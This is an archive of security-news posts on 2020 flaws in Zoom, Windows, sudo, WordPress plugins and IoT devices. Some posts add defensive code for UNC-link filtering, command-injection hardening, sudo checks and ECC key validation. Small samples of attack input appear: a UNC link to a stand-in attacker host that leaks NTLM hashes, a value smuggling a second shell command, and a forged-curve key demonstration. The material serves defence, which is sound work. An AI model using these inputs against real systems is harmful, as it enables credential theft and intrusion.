Archive for the ‘vulnerabilities’ Category

Attackers can use Zoom to steal users’ Windows credentials with no warning

April 1st, 2020

Users of Zoom for Windows beware: the widely used software has a vulnerability that allows attackers to steal your operating system credentials, researchers said.

Discovery of the currently unpatched vulnerability comes as Zoom usage has soared in the wake of the coronavirus pandemic. With massive numbers of people working from home, they rely on Zoom to connect with co-workers, customers, and partners. Many of these home users are connecting to sensitive work networks through temporary or improvised means that don’t have the benefit of enterprise-grade firewalls found on-premises.

Embed network location here

Attacks work by using the Zoom chat window to send targets a string of text that represents a network location in Windows' Universal Naming Convention (UNC) format, such as \\attacker.example.com\C$. The Zoom client for Windows automatically converts these strings into clickable links. If a target clicks such a link from a network that doesn't block outbound SMB, Windows tries to open the share and, in doing so, sends the user's Windows username together with an NTLM challenge-response (commonly called the NTLM hash) to the attacker-controlled host named in the link. The attacker can crack that value offline to recover the password or, on networks that permit it, relay it to authenticate as the user.
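The fix on the client side is to linkify only an allowlist of web schemes and never a file or UNC location. As an added example (this is not Zoom's code and not from the Ars article; the regexes and function names are mine), the following detects UNC strings in a chat message and shows a linkifier that leaves them inert. The message it runs on is constructed.

```python
import html
import re

# Universal Naming Convention paths start with two backslashes (Windows also
# accepts two forward slashes): \\host\share[\path...]. The lookbehind keeps
# the "//" inside "https://..." from being treated as a UNC path.
UNC_RE = re.compile(r'(?<![\w\\/:])(?:\\\\|//)[\w.-]+(?:[\\/][\w$.-]+)+')

# Allowlist of what may become a link: web URLs only.
HTTP_URL_RE = re.compile(r'\bhttps?://[^\s<>"\']+')


def find_unc_paths(text):
    """Return every UNC-style path embedded in a chat message, for logging or blocking."""
    return UNC_RE.findall(text)


def linkify_safe(text):
    """Turn http(s) URLs into anchors and HTML-escape everything else.

    A UNC path is never converted, so a click can't make the SMB client
    reach out to an attacker's host with the user's NTLM credentials.
    """
    out = []
    pos = 0
    for m in HTTP_URL_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        url = m.group(0)
        out.append('<a href="%s">%s</a>' % (html.escape(url, quote=True), html.escape(url)))
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


if __name__ == "__main__":
    # Constructed chat message, not a real capture.
    msg = r"Meeting notes: https://zoom.example/j/1 and \\attacker.example.com\C$"
    print(find_unc_paths(msg))   # ['\\\\attacker.example.com\\C$']
    print(linkify_safe(msg))     # the URL becomes an anchor; the UNC path stays plain text
```

On the endpoint and network side, the complementary controls are the Group Policy setting "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" set to "Deny all" and blocking outbound TCP port 445 at the network edge, so a stray click cannot complete an SMB authentication to the Internet.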


Posted in Biz & IT, credentials, exploits, vulnerabilities, Windows, zoom

Windows code-execution zeroday is under active exploit, Microsoft warns

March 23rd, 2020

Attackers are actively exploiting a Windows zero-day vulnerability that can execute malicious code on fully updated systems, Microsoft warned on Monday.

The font-parsing remote code-execution vulnerability is being used in “limited targeted attacks,” the software maker said in an advisory published on Monday morning. The security flaw exists in the Adobe Type Manager Library (atmfd.dll), a Windows DLL that a wide variety of apps use to manage and render fonts from Adobe Systems. The vulnerability consists of two code-execution flaws triggered by the improper handling of maliciously crafted multi-master fonts in the Adobe Type 1 PostScript format. Attackers can exploit them by convincing a target to open a booby-trapped document, or simply to view it in the Windows Explorer preview pane, which renders the file without it ever being opened. Until a patch ships, Microsoft's advisory lists workarounds: disable the preview and details panes in Windows Explorer, disable the WebClient service, and rename ATMFD.DLL.

“Microsoft is aware of limited, targeted attacks that attempt to leverage this vulnerability,” Monday’s advisory warned.


Posted in Biz & IT, exploits, Flaw, microsoft, vulnerabilities, Windows

Critical bugs in dozens of Zyxel and Lilin IoT models under active exploit

March 21st, 2020

Criminals are exploiting critical flaws to corral Internet-of-things devices from two different manufacturers into botnets that wage distributed denial-of-service attacks, researchers said this week. Both DVRs from Lilin and storage devices from Zyxel are affected, and users should install updates as soon as possible.

Multiple attack groups are exploiting the Lilin DVR vulnerability to conscript the devices into DDoS botnets known as FBot, Chalubo, and Moobot, researchers from security firm Qihoo 360 said on Friday. The latter two botnets are spinoffs of Mirai, the botnet that used hundreds of thousands of IoT devices to bombard sites with record-setting amounts of junk traffic.

The DVR vulnerability stems from three flaws that together allow attackers to remotely inject malicious commands into the device: (1) hard-coded login credentials present in the device, (2) command-injection flaws, and (3) arbitrary file-read weaknesses. The injectable parameters are the ones that configure the device's file transfer protocol (FTP) client, its network time protocol (NTP) client, and the NTP update mechanism.
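The command-injection class the Qihoo 360 researchers describe, shown as an added example that is not Lilin's firmware and not the researchers' code: an NTP-server setting submitted through the device's web interface is spliced into a shell command string (the vulnerable pattern) versus validated against a strict allowlist and passed as an argv list with no shell (the hardened pattern). The `ntpdate` invocation, the parameter shape and the sample inputs are my assumptions for illustration.

```python
import re

# Strict shape for a hostname or IPv4 literal: dot-separated labels of letters,
# digits and hyphens, each starting with an alphanumeric so no leading "-" can
# be read as a switch. Every shell metacharacter (; | & $ ` newline, quotes)
# falls outside the allowlist.
HOST_RE = re.compile(
    r'^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?'
    r'(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$'
)


def ntp_command_vulnerable(server):
    """The anti-pattern (illustrative, not the DVR's real code): the form value
    is pasted into a command string that a CGI handler hands to system()/popen(),
    so "host; cmd" runs cmd as the web server's user, typically root on a DVR."""
    return "ntpdate -u %s" % server


def ntp_command_hardened(server):
    """Validate against the allowlist first, then return an argv list for
    subprocess.run(argv) with shell=False: the value can only ever be one argument."""
    if not HOST_RE.match(server):
        raise ValueError("rejected NTP server value: %r" % server)
    return ["ntpdate", "-u", server]


def is_injection_attempt(server):
    """For request logging or a WAF rule: True when the value fails validation."""
    return HOST_RE.match(server) is None


if __name__ == "__main__":
    # Constructed inputs, not traffic captured from a real device.
    benign = "pool.ntp.org"
    hostile = "pool.ntp.org; id"        # harmless stand-in for an injected command
    print(ntp_command_vulnerable(hostile))   # ntpdate -u pool.ntp.org; id
    print(ntp_command_hardened(benign))      # ['ntpdate', '-u', 'pool.ntp.org']
    try:
        ntp_command_hardened(hostile)
    except ValueError as err:
        print("blocked:", err)
```

Hard-coded credentials, the first of the three flaws, defeat even the hardened version, because anyone who knows the built-in password can reach the settings handler; per-device credentials set at first boot are the matching fix there.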


Posted in Biz & IT, DVRs, exploits, Internet of things, lilin, network attached storage, vulnerabilities, Zyxel

Microsoft delivers emergency patch to fix wormable Windows 10 flaw

March 12th, 2020

Microsoft on Thursday released an unscheduled fix for a critical security bug that makes it possible for attackers to remotely execute malicious code that can spread from vulnerable machine to vulnerable machine without requiring any interaction from users.

The flaw, in version 3 of Microsoft's implementation of the Server Message Block protocol, is present only in 32- and 64-bit Windows 10 versions 1903 and 1909 and the matching Windows Server versions 1903 and 1909. Although the vulnerability is difficult to exploit reliably, Microsoft and outside researchers consider it critical because it opens large networks to "wormable" attacks, in which the compromise of a single machine can trigger a chain reaction that quickly infects every other vulnerable Windows machine. That's the scenario that played out with WannaCry and NotPetya in 2017.

In a bulletin accompanying Thursday's patch, Microsoft said it has no evidence the flaw is being actively exploited, but the company went on to label the bug as "exploitation more likely." That designation means malicious actors will probably develop and use exploits in the future.


Posted in Biz & IT, exploits, microsoft, Server Message Block, SMB, vulnerabilities, Windows 10

Windows has a new wormable vulnerability, and there’s no patch in sight

March 11th, 2020

Word leaked out on Tuesday of a new vulnerability in recent versions of Windows that has the potential to unleash the kind of self-replicating attacks that allowed the WannaCry and NotPetya worms to cripple business networks around the world.

The vulnerability exists in version 3.1.1 of the Server Message Block protocol (SMBv3), which is used to share files, printers, and other resources on local networks and over the Internet. It lies in the way the protocol handles compressed packets, a feature Microsoft introduced with Windows 10 version 1903. Attackers who successfully exploit the flaw can execute code of their choice on both servers and end-user computers that use the vulnerable protocol, Microsoft said in a bare-bones advisory.

The flaw, which is tracked as CVE-2020-0796, affects Windows 10 versions 1903 and 1909 and the matching Windows Server versions 1903 and 1909, relatively new releases that Microsoft has invested huge amounts of resources hardening against precisely these types of attacks. Patches aren't available, and Tuesday's advisory gave no timeline for one being released. It did offer interim workarounds: disable SMBv3 compression on servers (set the DisableCompression DWORD value to 1 under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters) and block TCP port 445 at the enterprise perimeter. The advisory notes that disabling compression doesn't protect SMB clients, which can still be attacked by a malicious server they connect to. Asked if there was a timeline for releasing a fix, a Microsoft representative said: “Beyond the advisory you linked, nothing else to share from Microsoft at this time.”


Posted in Biz & IT, computer worms, exploits, microsoft, vulnerabilities, Windows

5 years of Intel CPUs and chipsets have a concerning flaw that’s unfixable

March 5th, 2020
An 8th-generation Intel Core Processor. (credit: Intel)

Virtually all Intel chips released in the past five years contain an unfixable flaw that may allow sophisticated attackers to defeat a host of security measures built into the silicon. While Intel has issued patches to lessen the damage of exploits and make them harder, security firm Positive Technologies said the mitigations may not be enough to fully protect systems.

The flaw resides in the Converged Security and Management Engine, a subsystem inside Intel CPUs and chipsets that's roughly analogous to AMD's Platform Security Processor. Often abbreviated as CSME, this subsystem implements the firmware-based Trusted Platform Module used for silicon-based encryption, authentication of UEFI BIOS firmware, Microsoft System Guard and BitLocker, and other security features. The bug stems from the CSME's input-output memory management unit, which protects the engine's static random-access memory against malicious modification, being activated too late in the firmware boot process. That gap creates a window in which other chip components, such as the Integrated Sensor Hub, can execute malicious code very early in the boot process with the highest system privileges.

Jeopardizing Intel’s root of trust

Because the flaw resides in the CSME mask ROM, the hard-wired on-chip code that loads the very first stage of CSME firmware, the vulnerability can't be patched with a firmware update.


Posted in Biz & IT, chipsets, CPUs, exploits, firmware, hacking, Intel, vulnerabilities

Hackers exploit critical vulnerability found in ~100,000 WordPress sites

February 18th, 2020

Hackers are actively exploiting a critical WordPress plugin vulnerability that allows them to completely wipe all website databases and, in some cases, seize complete control of affected sites.

The flaw is in the ThemeGrill Demo Importer, a plugin installed on some 100,000 sites, and it was disclosed over the weekend by website security company WebARX. By Tuesday, WebARX reported that the flaw was under active exploit, with almost 17,000 attacks blocked so far. Hanno Böck, a journalist who works for Golem.de, had spotted active attacks several hours earlier and reported them on Twitter.

"There's currently a severe vuln in a wordpress plugin called "themegrill demo importer" that resets the whole database," Böck wrote. "https://webarxsecurity.com/critical-issue-in-themegrill-demo-importer/ It seems attacks are starting: Some of the affected webpages show a wordpress 'hello world'-post. /cc If you use this plugin and your webpage hasn't been deleted yet consider yourself lucky. And remove the plugin. (Yes, remove it, don't just update.)"


Posted in Biz & IT, exploits, Plugin, vulnerabilities, WordPress

Serious flaw that lurked in sudo for 9 years finally gets a patch

February 4th, 2020
An excerpt from the xkcd comic strip parodies sudo. (credit: xkcd)

Sudo, a utility found in dozens of Unix-like operating systems, has received a patch for a potentially serious bug that allows unprivileged users to easily obtain unfettered root privileges on vulnerable systems.

The vulnerability, tracked as CVE-2019-18634, is the result of a stack-based buffer overflow that is exploitable in versions 1.7.1 through 1.8.25p1. (Versions 1.8.26 through 1.8.30 still contain the bug, but a change in how sudo handles end-of-file makes it unexploitable; the fix is in 1.8.31.) It can be triggered only when either an administrator or a downstream OS, such as Linux Mint and Elementary OS, has enabled an option known as pwfeedback, which echoes an asterisk for each password character typed. With pwfeedback turned on, the vulnerability can be exploited even by users who aren't listed in sudoers, the file that defines who may run what through the sudo command.

Sudo is a powerful utility that’s included in most if not all Unix- and Linux-based OSes. It lets administrators permit specific individuals or groups to run commands or applications with higher-than-usual system privileges. Both Apple’s macOS and Debian distributions of Linux received updates last week. People using other OSes should check their sudo version (sudo -V) and their configuration (sudo -l lists the Defaults entries in effect, including pwfeedback) to ensure they’re not vulnerable.
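The version-and-configuration check the previous paragraph recommends, written out as an added example that is not part of the sudo project or the Ars article. It takes the first line of `sudo -V` and the text of a sudoers file (or the "Matching Defaults entries" that `sudo -l` prints) and reports whether CVE-2019-18634 applies; the version boundaries are the ones the sudo project's advisory gives. The sudoers snippets it runs on are constructed, and the parser only follows the Defaults syntax shown in its comments, not the full sudoers grammar (included files are not followed).

```python
import re

# From the sudo project's advisory for CVE-2019-18634: the overflow is
# exploitable in 1.7.1 through 1.8.25p1; 1.8.26 through 1.8.30 still contain
# the bug but a change in EOF handling blocks the exploit; 1.8.31 removes it.
# None of it matters unless "pwfeedback" is enabled.
AFFECTED_MIN = (1, 7, 1, 0)
EXPLOITABLE_MAX = (1, 8, 25, 1)
AFFECTED_MAX = (1, 8, 30, 0)
FIXED_IN = "1.8.31"

VERSION_RE = re.compile(r'(\d+)\.(\d+)\.(\d+)(?:p(\d+))?')
# Matches "Defaults", "Defaults:user", "Defaults@host", "Defaults>runas", "Defaults!cmd".
DEFAULTS_RE = re.compile(r'^\s*Defaults(?:[:@>!]\S+)?\s+(.*)$')


def parse_sudo_version(text):
    """Accept '1.8.25p1' or the first line of `sudo -V` ('Sudo version 1.8.25p1').
    Returns (major, minor, patch, p-level) so tuples compare in release order."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError("no sudo version found in %r" % text)
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def pwfeedback_enabled(sudoers_text):
    """Walk Defaults lines in file order; the last mention of pwfeedback wins."""
    enabled = False
    for raw in sudoers_text.splitlines():
        line = raw.split('#', 1)[0]      # strip comments (this also drops #include lines, which are not followed)
        m = DEFAULTS_RE.match(line)
        if not m:
            continue
        for opt in m.group(1).split(','):
            opt = opt.strip()
            if opt == 'pwfeedback':
                enabled = True
            elif opt == '!pwfeedback':
                enabled = False
    return enabled


def assess(version_text, sudoers_text):
    """One-line verdict for this host."""
    v = parse_sudo_version(version_text)
    if not pwfeedback_enabled(sudoers_text):
        return "not vulnerable: pwfeedback is off"
    if v < AFFECTED_MIN or v > AFFECTED_MAX:
        return "not vulnerable: version outside 1.7.1-1.8.30"
    if v <= EXPLOITABLE_MAX:
        return "exploitable: upgrade to %s or disable pwfeedback" % FIXED_IN
    return "bug present but not exploitable: upgrade to %s" % FIXED_IN


if __name__ == "__main__":
    # Constructed sudoers fragment in the style Linux Mint shipped.
    sudoers = "Defaults env_reset, pwfeedback\nroot ALL=(ALL) ALL\n"
    print(assess("Sudo version 1.8.25p1", sudoers))   # exploitable: upgrade to 1.8.31 or disable pwfeedback
    print(assess("Sudo version 1.8.31", sudoers))     # not vulnerable: version outside 1.7.1-1.8.30
```

On a live system the two inputs come from `sudo -V | head -1` and `sudo -l`; the quickest mitigation when an upgrade is not immediately possible is a `Defaults !pwfeedback` line placed after any line that enables it.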


Posted in Biz & IT, linux, MacOS, Sudo, UNIX, vulnerabilities

Researchers find serious flaws in WordPress plugins used on 400k sites

January 17th, 2020

Serious vulnerabilities have recently come to light in three WordPress plugins that have been installed on a combined 400,000 websites, researchers said. InfiniteWP, WP Time Capsule, and WP Database Reset are all affected.

The highest-impact flaw is an authentication bypass vulnerability in the InfiniteWP Client, a plugin installed on more than 300,000 websites. It allows administrators to manage multiple websites from a single server. The flaw lets anyone log in to an administrative account with no credentials at all. From there, attackers can delete contents, add new accounts, and carry out a wide range of other malicious tasks.

People exploiting the vulnerability need only know the user name of a valid account and include a malicious payload in a POST request that's sent to a vulnerable site. According to Web application firewall provider Wordfence, the vulnerability stems from a feature that allows legitimate users to automatically log in as an administrator without providing a password.


Posted in Biz & IT, Plugins, vulnerabilities, Websites, WordPress

Critical Windows 10 vulnerability used to Rickroll the NSA and Github

January 16th, 2020
Chrome on Windows 10 as it Rickrolls the NSA. (credit: https://twitter.com/saleemrash1d/status/1217519809732259840/photo/1)

Less than a day after Microsoft disclosed one of the most critical Windows vulnerabilities ever, a security researcher has demonstrated how attackers can exploit it to cryptographically impersonate any website or server on the Internet.

Researcher Saleem Rashid on Wednesday tweeted images of the video "Never Gonna Give You Up," by 1980s heartthrob Rick Astley, playing on Github.com and NSA.gov. The digital sleight of hand is known as Rickrolling and is often used as a humorous and benign way to demonstrate serious security flaws. In this case, Rashid's exploit causes both the Edge and Chrome browsers to accept spoofed versions of the Github and National Security Agency sites as the genuine, HTTPS-verified websites. Brave and other Chrome derivatives, as well as Internet Explorer, are also likely to fall to the same trick. (There's no indication Firefox is affected; it validates certificates with its own NSS library rather than the Windows CryptoAPI.)

Rashid's simulated attack exploits CVE-2020-0601, the critical vulnerability that Microsoft patched on Tuesday after receiving a private tipoff from the NSA. As Ars reported, the flaw can completely break certificate validation for websites, software updates, VPNs, and other security-critical computer uses. The bug is in the way the Windows CryptoAPI (crypt32.dll) validates elliptic-curve cryptography certificates: it accepts a certificate whose curve is spelled out as explicit parameters instead of a standard named curve, and it compares the certificate's public key with that of a cached trusted root without checking that the curve parameters match, so an attacker can craft a key whose public point equals a trusted root's while using a generator of their own choosing. It affects Windows 10 and Windows Server 2016 and 2019. Other versions of Windows are unaffected.
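The check a validator needs in order to be immune to this class of bug is simple to state: for an ECC SubjectPublicKeyInfo, the AlgorithmIdentifier parameters must be a named-curve OID, never an explicit ECParameters SEQUENCE, and trust must be decided on the whole key structure rather than the public point alone. As an added example (not Microsoft's, Rashid's, or the article's code), the following hand-rolls just enough DER, using only the standard library, to build a P-256 key with a named curve and a forged key carrying the same public point but explicit parameters, then contrasts a matching rule that models the CryptoAPI flaw with the strict one. The public point, the explicit field and curve values are dummies and the explicit structure is only shaped like RFC 5480 ECParameters; a real validator would use a full ASN.1 parser and a certificate-chain builder.

```python
# Stdlib-only DER helpers, written for this example; not a general ASN.1 library.

EC_PUBLIC_KEY_OID = "1.2.840.10045.2.1"   # id-ecPublicKey
P256_OID = "1.2.840.10045.3.1.7"          # secp256r1 / prime256v1
PRIME_FIELD_OID = "1.2.840.10045.1.1"     # prime-field, used inside explicit ECParameters


def der_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, body):
    return bytes([tag]) + der_len(len(body)) + body


def der_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]               # base-128, most significant group first
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))


def der_int(n):
    body = n.to_bytes(max(1, (n.bit_length() + 8) // 8), "big")   # extra byte keeps the sign bit clear
    return tlv(0x02, body)


def read_tlv(buf, pos):
    """Return (tag, body, position just after this element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def build_spki(params_der, point):
    """SubjectPublicKeyInfo ::= SEQUENCE { AlgorithmIdentifier, BIT STRING subjectPublicKey }"""
    alg = tlv(0x30, der_oid(EC_PUBLIC_KEY_OID) + params_der)
    return tlv(0x30, alg + tlv(0x03, b"\x00" + point))


def explicit_params_like_p256(generator):
    """ECParameters with RFC 5480's field order but dummy field/curve values:
    only the shape matters here, and the base point G is attacker-chosen."""
    return tlv(0x30,
               der_int(1)                                                   # version
               + tlv(0x30, der_oid(PRIME_FIELD_OID) + der_int(2 ** 255 - 19))  # fieldID (dummy prime)
               + tlv(0x30, tlv(0x04, b"\x01") + tlv(0x04, b"\x02"))         # curve a, b (dummy)
               + tlv(0x04, generator)                                       # base point G
               + der_int(2 ** 255)                                          # order (dummy)
               + der_int(1))                                                # cofactor


def ec_parameters_kind(spki_der):
    """'named', 'explicit', 'implicit', 'unknown' or 'not-ec', from the AlgorithmIdentifier."""
    tag, spki, _ = read_tlv(spki_der, 0)
    if tag != 0x30:
        raise ValueError("SPKI must be a SEQUENCE")
    _, alg_id, _ = read_tlv(spki, 0)
    tag, oid_body, pos = read_tlv(alg_id, 0)
    if tlv(tag, oid_body) != der_oid(EC_PUBLIC_KEY_OID):
        return "not-ec"
    if pos >= len(alg_id):
        return "implicit"                   # parameters absent
    ptag, _, _ = read_tlv(alg_id, pos)
    return {0x06: "named", 0x30: "explicit", 0x05: "implicit"}.get(ptag, "unknown")


def public_point(spki_der):
    _, spki, _ = read_tlv(spki_der, 0)
    _, _, pos = read_tlv(spki, 0)           # skip AlgorithmIdentifier
    _, bits, _ = read_tlv(spki, pos)
    return bits[1:]                         # drop the unused-bits octet of the BIT STRING


def flawed_trust_match(candidate, trusted_root):
    """Models the CVE-2020-0601 logic: the key is 'the' trusted root whenever the
    public point matches, whatever curve parameters it claims."""
    return public_point(candidate) == public_point(trusted_root)


def strict_trust_match(candidate, trusted_root):
    """Correct: named curves only, and the entire SPKI must match byte for byte."""
    return ec_parameters_kind(candidate) == "named" and candidate == trusted_root


if __name__ == "__main__":
    point = b"\x04" + bytes(range(64))      # constructed stand-in for an uncompressed P-256 point
    root = build_spki(der_oid(P256_OID), point)
    forged = build_spki(explicit_params_like_p256(b"\x04" + b"\xaa" * 64), point)
    print(ec_parameters_kind(root), ec_parameters_kind(forged))                 # named explicit
    print(flawed_trust_match(forged, root), strict_trust_match(forged, root))   # True False
```

The forged key passes the flawed rule because the attacker, free to choose the generator, can make their own private key correspond to the root's public point; rejecting explicit parameters outright removes that freedom, which is the rule the TLS ECC profile in RFC 8422 already imposes on clients and servers.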


Posted in Biz & IT, Certificates, cryptography, exploits, validation, vulnerabilities, Windows 10